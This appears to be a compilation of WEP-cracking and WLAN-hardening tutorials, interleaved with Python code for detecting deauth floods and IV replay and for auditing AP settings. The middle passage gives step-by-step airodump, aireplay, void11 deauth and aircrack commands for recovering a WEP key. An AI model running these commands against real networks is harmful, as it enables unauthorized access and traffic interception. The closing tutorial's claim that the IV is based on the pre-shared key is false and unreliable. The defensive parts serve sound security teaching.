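TYPE_MGMT, TYPE_DATA = 0, 2   # 802.11 frame-control type field values
SUBTYPE_DEAUTH = 12           # management subtype: deauthentication
FC_PROTECTED = 0x40           # "protected frame" bit in the second FC byte

def parse_frame(raw):
    """Decode the 802.11 MAC header fields a monitor needs from raw bytes."""
    if len(raw) < 24:
        return None
    fc0, fc1 = raw[0], raw[1]
    frame = {
        "type": (fc0 >> 2) & 0x3,
        "subtype": (fc0 >> 4) & 0xF,
        "addr1": raw[4:10].hex(":"),    # receiver
        "addr2": raw[10:16].hex(":"),   # transmitter
        "addr3": raw[16:22].hex(":"),   # BSSID for management frames
    }
    # WEP places its 3-byte IV (plus a key-index byte) right after the header
    if frame["type"] == TYPE_DATA and fc1 & FC_PROTECTED and len(raw) >= 28:
        frame["iv"] = raw[24:27].hex()
    if frame["type"] == TYPE_MGMT and frame["subtype"] == SUBTYPE_DEAUTH and len(raw) >= 26:
        frame["reason"] = int.from_bytes(raw[24:26], "little")
    return frame

def detect_deauth_flood(capture, window_s=1.0, threshold=10):
    """Return BSSIDs that sent more than `threshold` deauths inside any window.
    `capture` is a list of (timestamp_seconds, raw_frame_bytes)."""
    per_bssid = defaultdict(list)
    for ts, raw in capture:
        f = parse_frame(raw)
        if f and f["type"] == TYPE_MGMT and f["subtype"] == SUBTYPE_DEAUTH:
            per_bssid[f["addr3"]].append(ts)
    flagged = []
    for bssid, times in per_bssid.items():
        times.sort()
        start = 0                      # sliding window over sorted timestamps
        for end, t in enumerate(times):
            while t - times[start] > window_s:
                start += 1
            if end - start + 1 > threshold:
                flagged.append(bssid)
                break
    return flagged

def detect_iv_replay(capture, threshold=5):
    """Return (transmitter, iv, count) for WEP frames whose IV repeats more than
    `threshold` times; a client rarely repeats an IV within a short capture,
    while a replay tool resends one frame over and over."""
    seen = Counter()
    for _, raw in capture:
        f = parse_frame(raw)
        if f and "iv" in f:
            seen[(f["addr2"], f["iv"])] += 1
    return [(tx, iv, n) for (tx, iv), n in seen.items() if n > threshold]

# ---- constructed sample traffic (MAC addresses reuse the article's examples) ----
AP = "00:c0:49:bf:14:29"
STA = "00:90:4b:c0:c4:7f"
BCAST = "ff:ff:ff:ff:ff:ff"

def _mac(s):
    return bytes.fromhex(s.replace(":", ""))

def deauth_frame(bssid, dst, reason=7):
    """Management/deauth frame from the AP: addr1=dst, addr2=addr3=BSSID."""
    header = bytes([0xC0, 0x00]) + b"\x00\x00" + _mac(dst) + _mac(bssid) + _mac(bssid) + b"\x00\x00"
    return header + reason.to_bytes(2, "little")

def wep_data_frame(src, bssid, iv):
    """Protected data frame toward the AP (ToDS=1): 24-byte header, IV, key index
    and a 40-byte body, the size of a WEP-encrypted ARP request (68 bytes total)."""
    header = bytes([0x08, 0x41]) + b"\x00\x00" + _mac(bssid) + _mac(src) + _mac(BCAST) + b"\x00\x00"
    return header + iv + b"\x00" + b"\x00" * 40

def sample_capture():
    capture = []
    for i in range(30):                 # 30 broadcast deauths in under a second
        capture.append((i * 0.03, deauth_frame(AP, BCAST)))
    capture.append((5.0, deauth_frame("00:11:22:33:44:55", STA, reason=3)))  # one ordinary deauth
    for i in range(20):                 # ordinary client traffic, fresh IV each frame
        capture.append((10.0 + i * 0.1, wep_data_frame(STA, AP, bytes([0x10, 0x20, i]))))
    replayed = wep_data_frame(STA, AP, bytes([0xAA, 0xBB, 0xCC]))
    for i in range(50):                 # the same encrypted frame resent 50 times
        capture.append((20.0 + i * 0.005, replayed))
    return capture

if __name__ == "__main__":
    cap = sample_capture()
    print("deauth flood from:", detect_deauth_flood(cap))
    print("replayed frames:", detect_iv_replay(cap))
```

The deauth check keys on addr3 (the BSSID) rather than addr2 because a flood tool spoofs the AP's address as transmitter; counting per BSSID still isolates which network is under attack. The replay check works on ciphertext alone, since WEP's IV is sent in the clear, so a sensor needs no key to spot a frame being resent.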

Packet capture and cracking


At this point Auditor-A is running a replay attack and producing plenty of IVs. Now it's finally time to do the actual WEP cracking. Stop void11 on AUDITOR-B, if you haven't done so already. Type in the following commands to set up airodump to capture packets for cracking.

Starting up airodump after stopping void11

switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
airodump wlan0 cap1

NOTES:
- switch-to-wlanng and monitor.wlan are custom scripts that come installed on the Auditor CD to simplify commands and reduce typing
- Replace THECHANNELNUM with the channel number of your Target WLAN
- If there are many wireless access points in range, append the MAC address of your target AP to the end of the airodump command, i.e. airodump wlan0 cap1 MACADDRESSOFAP

After airodump starts, you should now see the IV count rise to about 200 per second, thanks to the aireplay replay attack running on Auditor-A.

Figure 14: After ten minutes of aireplay

With airodump writing IVs into a capture file, we can run aircrack at the same time to find the WEP key. Keep airodump running and open another shell window. Type the following commands into the new window to start aircrack:

Starting aircrack

cd /ramdisk
aircrack -f FUDGEFACTOR -m MACADDRESSOFAP -n WEPKEYLENGTH -q 3 cap*.cap

NOTES:
- FUDGEFACTOR is an integer (default is 2)
- MACADDRESSOFAP is the MAC address of the Target AP
- WEPKEYLENGTH is the length of the WEP key you are trying to crack (64, 128, 256 or 512)

Figure 15 shows an example of a complete command.

Figure 15: aircrack usage

Aircrack will read in unique IVs from all the capture files and then perform a statistical attack on those IVs. A lower "fudge factor" (-f parameter) has less chance of succeeding, but is very fast. A high fudge factor is slower, but has a higher chance of finding the WEP key. A fudge factor of 2 is the default starting point. You can stop aircrack by typing control-C or just let it run to completion (it will give up after a while if it doesn't find the WEP key, at least for 64 bit WEP keys). If you followed our syntax above, you can restart aircrack by hitting the up arrow and then enter, and aircrack will automatically include the updated contents of the airodump capture file. At some point, you should be rewarded with the screen shown in Figure 16.

Figure 16: Gotcha, Key Found!

Helpful hints
We broke a 64 bit WEP key in less than five minutes, which is the combined time for scanning with airodump, cracking with aircrack and stimulating traffic with aireplay running a simultaneous replay attack. There is a lot of luck involved and sometimes you may break the WEP encryption after gathering just 25,000 IVs, but most times it takes more than 100,000. You would expect a 128 bit key to take eons longer, but this is not the case. A 128 bit key can be broken with around 150,000 to 700,000 IVs, but capturing more IVs will definitely speed up the cracking process. When we reconfigured our target AP with a 128 bit key, we were able to recover the WEP key with 200,000 IVs, but it took the laptop we used more than an hour. Having more captured IVs would have sped up the process dramatically. It's important to note that you must input the length of the WEP key that you are trying to recover into aircrack and that none of these tools provide that information. While you know this information in your practice target WLAN, you wouldn't know it in a zero knowledge exploit. So you may need to try both 64 and 128 bit WEP key lengths in aircrack in order to be successful.

Figure 17: 128 bit WEP key found

Using a notebook with a fast processor and lots of memory for "Auditor-B" can help speed things along. You can also offload the capture files to other computers to speed up the cracking, while continuing to capture packets. We tested out this technique at the 2005 Interop Convention in Las Vegas. While one laptop was running airodump, we copied the capture files over to a very speedy server for cracking. The server (running aircrack) doesn't need wireless access since it just crunches away on the captured files. It goes without saying that you should use the fastest computer you can find to run aircrack. The new dual core processors from AMD and Intel may provide a speedup in WEP cracking since aircrack can spawn multiple processes with the -p option. You may find it convenient to save your capture files to a USB flash drive to "sneakernet" them to other computers. Simply open the shell and type the following:

Saving capture files to USB flash drive

mkdir /mnt/usb
mount -t vfat /dev/uba1 /mnt/usb
cp /ramdisk/cap*.cap /mnt/usb
umount /mnt/usb

Note that you must perform a umount to actually write the files to the flash drive.

Conclusion
WEP was never meant to secure a network, but was designed only to provide a WLAN with a level of security and privacy comparable to that expected of a wired LAN. This is clearly indicated by its full name, "Wired Equivalent Privacy". Recovering a WEP key is the equivalent of gaining physical access to a wired network. What happens next depends on the steps that have been taken to secure the resources of the network itself. Enterprise networks almost always require a user login, i.e. authentication, before allowing access to their networks. Servers are physically secured in locked server rooms and network wiring panels secured in locked closets. Networks are frequently segmented so that users are kept from accessing shares and servers that they have no need to access.

Unfortunately, trained in bad security habits by both Microsoft and Apple, most home PC users avoid logins and password-protected network shares like the plague. And while home networks may have made Internet and printer sharing possible, the combination of networked computers and poor security practices has turned more than one home network into an unholy mess of worm-infested zombies before people even know what hit them.

WEP was shown to have failed in its function shortly after 802.11 networks came into widespread use and the industry has been playing catch-up ever since. Key rotation, stronger IVs and other proprietary schemes were tried first. But businesses quickly realized that these measures were ineffective and either closed down their wireless LANs entirely or segregated them into limited-access separate networks, required the use of VPNs or took additional security measures. Fortunately, the wireless equipment makers quickly realized that stronger measures were needed if they were to be able to continue to sell wireless products to businesses and more security-conscious home networkers.

The answer came in the late fall of 2002 in the preliminary form of Wi-Fi Protected Access or WPA, followed a year or so later by the current improved version - WPA2. Despite the industry's foot-dragging in getting both technologies out to its users (and providing updates for existing products), either technology - even in its simplified "Personal" (or "PSK") form that uses password-based protection - will provide the level of security originally envisioned for WEP as long as a sufficiently random and long password is used. In Part 3 of this series, we will demonstrate some good and not so good ways to protect your network. But in the meantime, our basic recommendation is to secure your wireless LAN by using WPA or WPA2 (with a strong password), or turn off wireless access until you can. We hope that these articles have shown that WEP is simply not an option for real "wired equivalent" security.

To Explore Further
Tools Used

Auditor's Security Collection - Contains all the wireless hacking tools already installed
Kismet
Airsnort
Aircrack (includes Aireplay and Airodump)
void11

Related Articles

August 2, 2004 - Defcon 12: Hackers in Vegas
August 2, 2004 - Black Hat: Day 2 Sounds Security Alarm
July 30, 2004 - Black Hat Briefings Day 1
July 1, 2004 - Auditor Review (be advised that this version is old)

Command Summary
Commands for setting up airodump
iwconfig wlan0 mode monitor
iwconfig wlan0 channel THECHANNELNUM
cd /ramdisk
airodump wlan0 cap

Commands for setting up a void11 deauth attack


switch-to-hostap
cardctl eject
cardctl insert
iwconfig wlan0 channel THECHANNELNUM
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
void11_penetration -D -s MACOFSTATION -B MACOFAP wlan0

Commands to set up aireplay to listen for an ARP packet


switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
aireplay -i wlan0 -b MACADDRESSOFAP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff

Starting up airodump after stopping void11


switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
airodump wlan0 cap1

Starting aircrack
cd /ramdisk
aircrack -f FUDGEFACTOR -m MACADDRESSOFAP -n WEPKEYLENGTH -q 3 cap*.cap

Part 3: Securing your WLAN


Introduction
After demonstrating in How To Crack WEP - Part 1 and Part 2 that WEP cracking is easier than you may have thought, I will now switch gears. In this last part of the WEP Crack How To, I will show you how to take a common sense approach to protecting your wireless network. As any security professional knows, there is no such thing as perfect security. A good security plan takes into account the value of what needs to be protected, the cost of implementing the protection and the nature and skillset of the potential intruder in order to formulate an effective defense. In other words, rather than implementing every defensive measure known to man, a more prudent (and cost-effective) approach may be to tailor your defense to the threats that you most likely face. For example, wireless networks located in cities generally face more possible intrusions than those located in sparsely-populated areas. During the course of a day in a city, dozens, maybe hundreds of people may pass by your wireless LAN. And a car could also be parked outside your home for hours without attracting notice. But a wireless AP located in a home on a ten-acre farm would be unlikely to see any client but its owner's, and any unfamiliar vehicles would be noticed and investigated in short order.

Why Bother?
For some people, setting up a secure wireless network is so daunting, they give up and run it wide open, i.e. unsecured. I also hear people say, "I just surf the web and have nothing valuable on my computer. Why should I bother with security?" Good question, but here are some equally good answers. Running your WLAN wide open entails three major risks:

1) Your network resources are exposed to unknown users
Once someone wirelessly connects to your LAN, they have the same access as users directly connected into your LAN's Ethernet switch. Unless you have taken precautions to limit access to network resources and shares, intruders can do anything trusted, known users can do. Files, directories, or entire hard drives can be copied, changed or entirely deleted. Or worse, keystroke loggers, Trojans, zombie clients or other programs can be installed and left to work for their unknown masters.

2) All of your network traffic can be captured and examined
With the right tools, web pages can be reconstructed in real-time, URLs of websites you are visiting captured, and most importantly passwords you enter stolen and logged for future mis-use, most notably identity theft.

3) Your Internet connection can be used for illegal, immoral or objectionable activities
If your open WLAN is used to transfer bootleg movies or music, you could possibly be the recipient of a lawsuit notice from the RIAA. In a more extreme case, if your Internet connection were used to upload child pornography to an FTP site, or used to host the server itself, you could face more serious trouble. Your Internet connection could also be used by spammers, DoS extortionists and purveyors of malware, viruses and their like.

It may be a noble sentiment to give free Internet access to anyone within range of your wireless LAN. But unless you put some serious protection between your "open" LAN and the one you use, you are exposing your data, and perhaps more, to serious risk. The approach I'll take in formulating WLAN security recommendations is based on the expected skill level of potential wireless intruders. I'll then provide recommended security countermeasures for each skill level. NOTE: I will generally use "AP" (Access Point) throughout this article, but this should be read as meaning "Access Point or wireless router".

Skill Level 0: Anyone with a wireless computer


It doesn't take special skills to "hack" an unprotected wireless LAN - anyone with a wireless-enabled computer and the ability to turn it on is a potential intruder. Ease of use is often touted as a selling point of wireless networking products, but this often is a double-edged sword. In many cases, people innocently turning on their wireless computers will either automatically connect to your access point or see it in a list of "available" access points. The following countermeasures should help in securing your network against casual access, but offer no real protection against more skilled intruders. These are listed in relative order of importance. But most of them are so easy to do that I recommend doing them all if your equipment allows.

Countermeasure 1: Change Your Default Settings
At minimum, change the administration password (and username if your equipment allows), and default SSID on your AP or wireless router. Admin passwords for most consumer wireless gear are widely available. So if you don't change yours, you could find yourself locked out of being able to control your own WLAN (until you regain control via a factory reset)! Changing the default SSID is especially necessary when you are operating in proximity of other APs. If multiple APs from the same manufacturer are in the area, they will have the same SSID and client PCs will have a good chance of "accidentally" connecting to APs other than their own. When you change the SSID, don't use personal information in your SSID! During my Netstumbler sessions, I have seen the following as SSIDs:

First and Last names
Street Addresses with apartment numbers
Social Security Numbers
Phone Numbers

Changing the default channel of your AP might help you avoid interference from nearby wireless LANs, but it has little value as a security precaution since wireless clients generally automatically scan all available channels for potential connections.

Countermeasure 2: Upgrade Your Firmware, and maybe Hardware
Having the most current firmware installed on your AP can sometimes help improve security. Updated firmware often includes security bug fixes and sometimes adds new security features. With some newer consumer APs, a single click will check for and install new firmware. This is in contrast to older APs which required the user to look up, download and install the latest firmware from a sometimes difficult-to-navigate support site. APs that are more than a few years old have often reached their end of support lifecycle, meaning that no new firmware upgrades will be made available. If you find that your AP's latest firmware doesn't support at least the improved security of WPA (Wi-Fi Protected Access), and preferably the latest version called WPA2, you should seriously consider upgrading to new gear. The same goes for your wireless clients! Virtually all currently-available 802.11g gear supports at least WPA and is technically capable of being upgraded to WPA2. But manufacturers are not always diligent in their support of older products, so if you want to be sure that your gear supports WPA2, either check the Wi-Fi Alliance's certification database, or do some Googling in both the Web and Groups.

Countermeasure 3: Disable SSID broadcast
Most APs allow users to disable SSID broadcasting, which will thwart a Netstumbler scan. This will also stop Windows XP users using XP's built-in Wireless Zero Configuration utility and other client applications from initially seeing the wireless network. Figure 1 shows the control labeled "Hide ESSID" that will do the trick on a ParkerVision access point. ("SSID" and "ESSID" both refer to the same thing.)

Figure 1: Disabling SSID Broadcast on a Parkervision AP

NOTE: Disabling SSID broadcast will not prevent a potential intruder using Kismet or other wireless survey tools such as AirMagnet from seeing your wireless network. These tools don't rely on SSID broadcast for available network detection.

Countermeasure 4: Turn it off! People commonly overlook the simplest way of securing their wireless network - turning off the AP! A simple lamp timer can be used to turn off your AP during the overnight hours when you're not using it. If you have a wireless router, this will mean that your Internet connection will also be disabled, which also isn't such a bad thing. If you can't or don't want to periodically shut down your Internet connection, you'll have to remember to disable your wireless router's radio manually - if it has this feature. Figure 2 shows a typical wireless disable control. This manual method is more prone to error, however, since it's just one more thing to forget. Perhaps at some point manufacturers will add radio disable to the features that can be scheduled on wireless routers.

Figure 2: Shutting off the radio

Countermeasure 5: MAC Address Filtering MAC Address filtering is used to control access to your AP by allowing (or denying) access to a list of wireless client MAC addresses you enter. It will prevent an unskilled intruder from connecting to your WLAN, but MAC addresses are easily captured by more skilled attackers and wireless adapter MAC addresses easily changed to match a captured address.

Figure 3: MAC Address filtering on an older USR 8011 AP

Countermeasure 6: Lower the transmit power While only a few consumer APs have this feature, lowering your transmit power can help limit intentional and accidental unauthorized connections. But with the increased sensitivity of wireless cards that even unskilled users can purchase, it may not be worth the bother - especially if you're trying to prevent unwanted connections in an apartment building or dorm.

Most skilled attackers typically use high-gain antennas, which allow them to detect very low signal levels and effectively offset this countermeasure.

Skill Level 1: Anyone with commonly available wardriving tools


Now let's move up a notch on skill level to that of your common "wardriver", who actively cruises around looking for wireless LANs. Some people wardrive for kicks to see how many wireless networks they can detect and never attempt to use the vulnerable networks they find. But others are not so benign in their intent and do connect, use and sometimes abuse unsuspecting wireless LAN owners. At Skill Level 1, I'll assume that all the countermeasures suggested for Skill Level 0 do not work and the potential intruder can see your wireless network. The only effective countermeasures at this point involve encryption and authentication. I'll save authentication for later and focus on encryption. NOTE: While forcing all wireless traffic to use a VPN (Virtual Private Network) is one solution, VPNs are notoriously difficult to set up and beyond the scope of this article.

Countermeasure 7: Encryption
Wireless LAN owners should run the strongest type of encryption available to them. Your choices will be dictated by the capabilities of your WLAN hardware and your options are WEP, WPA and WPA2. WEP (Wired Equivalent Privacy) is the weakest wireless security technology, but currently the most widely deployed due to its availability on virtually all 802.11 wireless products. You may have to use it because many consumer wireless product manufacturers have opted to not provide upgrades from WEP to WPA for 802.11b products. And others are still creating new products, such as some VoIP wireless phones, that support only WEP, forcing some WLAN owners to downgrade their security to accommodate the lowest common level of security. Either WPA (Wi-Fi Protected Access) or WPA2 provides adequate wireless security, due to their stronger encryption technology and improved key management. The main difference between the two is that WPA2 supports stronger AES (Advanced Encryption Standard) encryption.
But to further confuse users, there are some WPA-labeled products that allow the selection of AES vs. the WPA-standard TKIP encryption. Most 802.11g products support WPA (but there are exceptions), but upgrades to WPA2 for older products are still in the process of being rolled out - even though the 802.11i standard that WPA2 is based on was ratified in June 2004. I recommend that you use WPA as a minimum. It is as effective as WPA2 and, at least as I write this, more widely supported. Implementing this recommendation, however, may require purchasing new equipment, especially if you currently are using 802.11b in your WLAN. But standard 11g gear is relatively inexpensive and could be the best security investment you make. Most consumer APs support only the "Personal" version of WPA or WPA2, which is also referred to as WPA-PSK (Pre-Shared Key) (see Figure 4). WPA2 or WPA "Enterprise" (also known as WPA "RADIUS") is also supported by some consumer wireless gear, but is of little use without the additional RADIUS server required to implement it.

Figure 4: Encrypting traffic on a Netgear AP

For most personal WLANs, using WPA-PSK will provide adequate protection, but it is essential to use a key that is sufficiently long and random. Do not use a number, or a word from the dictionary, since programs such as cowpatty are already available to perform dictionary-based attacks against WPA-PSK. Robert Moskowitz, Senior Technical Director ICSA Labs, recommended in this article using a 128 bit PSK. Fortunately, all WPA implementations accept alphanumeric PSKs, which would require only 16 characters to implement Mr. Moskowitz' recommendation. There are many password generators available on the Internet that can be found by a quick search. This one has lots of bells and whistles and even provides an estimation of how long it would take to crack the password it generates. As a final note, some manufacturers have started selling APs and wireless cards that promise "one touch" easy setup of secured wireless connections. Buffalo Technology had the first products based on their AOSS (AirStation One-Touch Secure Station) technology. Linksys has recently started selling products based on similar technology from Broadcom dubbed SecureEasySetup. These offerings will be reviewed in a future article.
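The checks in Countermeasure 1 (default SSID and admin password, personal information in the SSID) and the PSK advice just above can be expressed as a small configuration audit. What follows is an added example, not code from the article or any vendor tool. The config dictionary layout, the factory-default lists and the digit patterns used to spot SSN- or phone-like SSIDs are assumptions made for the example; the 8 to 63 character PSK limit is the one the WPA specification imposes on passphrases. One caveat the audit makes visible: the 16-character figure above counts 8 bits per character, but if each character is drawn uniformly from the 62 alphanumerics it contributes only log2(62), about 5.95 bits, so reaching 128 bits of entropy takes 22 such characters.

```python
# Added example (not code from the original article): an audit of an AP's
# settings against the countermeasures in this article. The config layout,
# default-value lists and personal-information patterns are assumptions;
# the 8-63 character PSK range comes from the WPA specification.
import math
import re
import string

# Constructed factory-default lists (assumption; a real audit would use a vendor database)
DEFAULT_SSIDS = {"linksys", "default", "netgear", "dlink", "wireless"}
DEFAULT_ADMIN_PASSWORDS = {"", "admin", "password", "1234"}

ENCRYPTION_RANK = {"none": 0, "wep": 1, "wpa-tkip": 2, "wpa2-aes": 3}

# Digit patterns that look like a US Social Security or phone number (assumption)
SSID_PERSONAL_INFO = [
    re.compile(r"\b\d{3}-?\d{2}-?\d{4}\b"),
    re.compile(r"\b\d{3}[-.]?\d{3}[-.]?\d{4}\b"),
]

CHAR_CLASSES = [string.digits, string.ascii_lowercase, string.ascii_uppercase, string.punctuation]

def psk_entropy_bits(psk):
    """Entropy estimate assuming each character was drawn uniformly from the
    union of the character classes actually used (62 for mixed alphanumerics)."""
    if not psk:
        return 0.0
    pool = sum(len(cls) for cls in CHAR_CLASSES if any(c in cls for c in psk))
    pool += len({c for c in psk if not any(c in cls for cls in CHAR_CLASSES)})
    return len(psk) * math.log2(pool)

def psk_length_for_bits(target_bits, pool_size):
    """Shortest uniformly random PSK over `pool_size` symbols reaching target_bits."""
    return math.ceil(target_bits / math.log2(pool_size))

def audit_ap(config, min_bits=128):
    """Return a list of findings for one AP configuration; empty means it passed.
    Assumed keys: ssid, admin_password, encryption, psk, firmware_current."""
    findings = []
    if config["ssid"].strip().lower() in DEFAULT_SSIDS:
        findings.append("default SSID")
    if any(p.search(config["ssid"]) for p in SSID_PERSONAL_INFO):
        findings.append("SSID looks like personal information")
    if config["admin_password"] in DEFAULT_ADMIN_PASSWORDS:
        findings.append("default admin password")
    enc = config["encryption"]
    if ENCRYPTION_RANK.get(enc, 0) < ENCRYPTION_RANK["wpa-tkip"]:
        findings.append(f"encryption {enc!r} is not WPA or better")
    else:
        psk = config.get("psk", "")
        if not 8 <= len(psk) <= 63:
            findings.append("PSK length outside the 8-63 character WPA range")
        bits = psk_entropy_bits(psk)
        if bits < min_bits:
            findings.append(f"PSK entropy ~{bits:.0f} bits is below {min_bits}")
    if not config.get("firmware_current", False):
        findings.append("firmware is not current")
    return findings

# Constructed configurations for the example
WEAK_AP = {"ssid": "linksys", "admin_password": "admin", "encryption": "wep",
           "psk": "", "firmware_current": False}
PERSONAL_AP = {"ssid": "123-45-6789", "admin_password": "Xk7!pq-Ls9",
               "encryption": "wpa-tkip", "psk": "fido2004", "firmware_current": True}
GOOD_AP = {"ssid": "cornfield-7", "admin_password": "Xk7!pq-Ls9",
           "encryption": "wpa2-aes", "psk": "Jx9#mL2vQ!r8Tz4@Wn6bYk3",
           "firmware_current": True}

if __name__ == "__main__":
    for name, cfg in [("weak", WEAK_AP), ("personal", PERSONAL_AP), ("good", GOOD_AP)]:
        print(name, audit_ap(cfg))
    print("alphanumeric characters needed for 128 bits:", psk_length_for_bits(128, 62))
```

The entropy estimate is deliberately optimistic: it assumes the characters really were generated at random, which is the only case in which a short PSK resists the dictionary attacks the text mentions. A passphrase such as fido2004 scores about 41 bits under that model and far less in practice.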

Skill Level 2: Anyone with WEP / WPA-PSK Cracking Skills


While WPA and WPA2 eliminate many of the problems associated with WEP, they are still vulnerable to attack, particularly in their PSK form. Many people have already cracked WEP, and Parts 1 and 2 of this series provided a step-by-step procedure. Breaking the pre-shared key of WPA and WPA2 "Personal" is much harder and more time consuming - especially if you are using AES encryption - but it is possible.

Countermeasure 8: Add Authentication
To address this emerging threat, users should implement authentication. Authentication adds another layer of security by requiring a client computer to "sign-in" to the network. Traditionally this has been done with a mix of certificates, tokens, or hand-typed passwords (also called Pre-Shared-Keys) that are negotiated with an authentication server. 802.1X provides the access control framework used by WEP, WPA and WPA2 and supports several EAP (Extensible Authentication Protocol) types that do the actual authentication. George Ou's excellent article on Authentication Protocols contains probably more than you'd ever want to know about EAP, WPA and WPA2! Configuring authentication can be a daunting and expensive task for networking professionals, let alone home networkers. At this year's RSA conference in San Francisco, for example, many attendees didn't bother to set up their wireless connection because of the full page of instructions they had to follow to do it! Thankfully, things are getting better, and you don't need to buy a full-blown RADIUS server, as there are a number of easier-to-implement alternatives. LucidLink offers a free fully-functional version of its namesake product through the end of 2005, which supports wireless security and authentication setup for up to three users. A similar product is Wireless Security Corporation's (recently purchased by McAfee) WSC Guard. It's a subscription-based product starting at $4.95 per user per month with discounts for volume purchases. A free 30 day trial download is available here. Another free option worth investigating for more experienced networkers is TinyPEAP, which adds a small RADIUS server supporting PEAP-based authentication into Linksys WRT54G and GS wireless routers. Note that since this firmware isn't officially supported by Linksys, you're on your own if you mess up your router while installing TinyPEAP.

Skill Level 3: Expert Cracker


Up until this point, we have blocked an intruder from wirelessly doing the equivalent of plugging their laptop into an Ethernet port on your LAN. But despite your best efforts, someone with expert cracking skills may penetrate all of your wireless defenses. What do you do now? There are wired and wireless LAN intrusion detection and prevention products available, but they are targeted at enterprise applications and come priced accordingly. There are also open source solutions that are unfortunately not user-friendly for networking novices. The most widely-used of these is Snort, which I hope to explore in a future article. But general network security practices have long dealt with traditional wired LAN intrusions, and can be used to combat an expert wireless intruder.

Countermeasure 9: Implement general LAN security

Implement the following countermeasures to improve general LAN security:

1) Require authentication to access any network resource
Any server, network share, router, etc. should preferably require user-level authentication for access. Although you won't be able to implement real user-level authentication without some sort of authentication server, you can at least password-protect all shared folders and disable Guest logins if you're running Windows XP. And never share the contents of entire hard drives!

2) Segment your network
In the extreme case, a computer not attached to a network is safe from network-based intrusion. But there are other ways to keep network users away from where they shouldn't be. A few properly-connected inexpensive NAT-based routers can be used to establish firewalled LAN segments while still allowing Internet access. See this How To for the details. Switches or routers with VLAN capabilities can also be used to separate LAN users. VLAN features can be found on most any "smart" or managed switch, but are harder to come by in consumer-priced routers and unmanaged switches.

3) Bulk up your software-based protection
At minimum, you need to run current versions of good anti-virus applications that automatically update their virus definition files. Personal firewalls such as ZoneAlarm, BlackICE, etc. can alert you to suspicious use of your network. And, unfortunately, the latest generation of malware and spyware threats make adding an anti-spyware application also necessary. Webroot Software's Spy Sweeper seems to be getting good marks lately, along with Sunbelt Software's CounterSpy. Note that you must install protection on every machine on your LAN in order to have effective protection!

4) Encrypt your files
Encrypting your files with strong encryption should provide effective protection in the event unauthorized users do gain access to them. Windows XP users can use Windows Encrypted File System (EFS). Mac OS X Tiger users can use FileVault. The downside to encryption is that it takes time and computing power to encrypt and decrypt files, which could slow things down more than you'd like.

Conclusion
Wireless networking provides us with convenience, but we must take a common sense approach in securing it. There is no single thing that will shield you from attack, and complete protection is very difficult to achieve against a determined intruder. But if you take the time to understand the possible risks your wireless LAN is likely to encounter, you can implement effective protection.

To Explore Further

The Unofficial 802.11 Security Page
Airdefense Top 10 Wireless LAN Policy Violations
NetworkWorld Protecting Wireless Networks
Wardrive.net Checklist for Defending Your Wireless Network
Joint Forces Staff College Defending Your Home Computer
Snort Wireless
List of IDS software (Commercial and Open Source)

Cracking WEP and WPA Wireless Networks


Overview
This is a good one, let me tell you! There can be so many issues setting up your box to actually get the tools working, and I'm not even touching on that, but if you can get everything to work, you'll be cracking wireless networks like a pro in no time.

Pre-Installation
Checklist

Tools
I've been really, really successful with basically one tool set called AirCrack. Download that. Kismet is an excellent tool for sniffing out wireless networks as well and could prove useful.

An encrypted wireless network
We'll be working on WEP encrypted networks as well as static passkey WPA, or WPA-PSK.

Note: Make sure you can get your card into monitor mode (sometimes called raw monitor or rfmon). This is VERY important.

WEP Cracking
Theory
A little theory first. WEP is a really crappy and old encryption technique to secure a wireless connection. A 3-byte vector, called an Initialization Vector or IV, is prepended onto packets and it's based on a pre-shared key that all the authenticated clients know... think of it as the network key you need to authenticate. Well, if it's on (almost) every packet generated by the client or AP, then if we collect enough of them, like a few hundred thousand, we should be able to dramatically reduce the keyspace to check and brute force becomes a realistic proposition. A couple of things will cause us some problems.

If the key is not static, then you'll mix up all your IVs and it'll take forever to decrypt the key.
There's no traffic, therefore no packets - we can fix this.
MAC Address Filtering - we can fix this too.
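The "few hundred thousand" figure above is not an accident of the tools; it follows from the IV being only 24 bits wide. The following Python is an added example, not code from the article or from the aircrack project, that works the numbers: the birthday bound on how many frames it takes before two share an IV, how long a card that simply increments its IV needs to wrap around, and a small monitoring helper that reports reused IVs in captured WEP frame bodies. The frame bodies at the bottom are constructed sample data, not a real capture.

```python
import math
from collections import Counter

IV_BITS = 24                 # WEP's IV is 3 bytes, sent in the clear before every encrypted frame
IV_SPACE = 1 << IV_BITS      # 16,777,216 possible values


def iv_collision_probability(n_frames: int, space: int = IV_SPACE) -> float:
    """Birthday-bound probability that at least two of n_frames carry the same IV,
    assuming the sender draws IVs uniformly at random (the best case for WEP)."""
    if n_frames < 2:
        return 0.0
    return 1.0 - math.exp(-n_frames * (n_frames - 1) / (2.0 * space))


def frames_for_collision(prob: float, space: int = IV_SPACE) -> int:
    """Smallest n with iv_collision_probability(n) >= prob, found by binary search."""
    lo, hi = 2, space
    while lo < hi:
        mid = (lo + hi) // 2
        if iv_collision_probability(mid, space) >= prob:
            hi = mid
        else:
            lo = mid + 1
    return lo


def seconds_to_wrap(frames_per_second: float, space: int = IV_SPACE) -> float:
    """Time until a sender that just increments its IV counter wraps around and
    starts reusing IVs.  500 frames/s is an assumed busy-network rate."""
    return space / frames_per_second


def find_iv_reuse(wep_bodies):
    """Monitoring helper: given captured WEP frame bodies (bytes starting at the
    IV), return {iv: count} for every IV seen more than once.  The first 3 bytes
    are the IV; byte 4 carries the key index in its top two bits."""
    counts = Counter(bytes(body[:3]) for body in wep_bodies if len(body) >= 4)
    return {iv: n for iv, n in counts.items() if n > 1}


if __name__ == "__main__":
    print(f"50% chance of an IV collision after {frames_for_collision(0.5)} frames")
    print(f"P(collision) with 300,000 frames: {iv_collision_probability(300_000):.6f}")
    print(f"Counter wraps after {seconds_to_wrap(500) / 3600:.1f} h at 500 frames/s")
    # Constructed sample bodies (IV + key byte + ciphertext), NOT real captures:
    sample = [bytes.fromhex("0a0b0c00aabb"), bytes.fromhex("0a0b0d00ccdd"),
              bytes.fromhex("0a0b0c00eeff"), bytes.fromhex("ff")]
    print("Reused IVs:", {iv.hex(): n for iv, n in find_iv_reuse(sample).items()})
```

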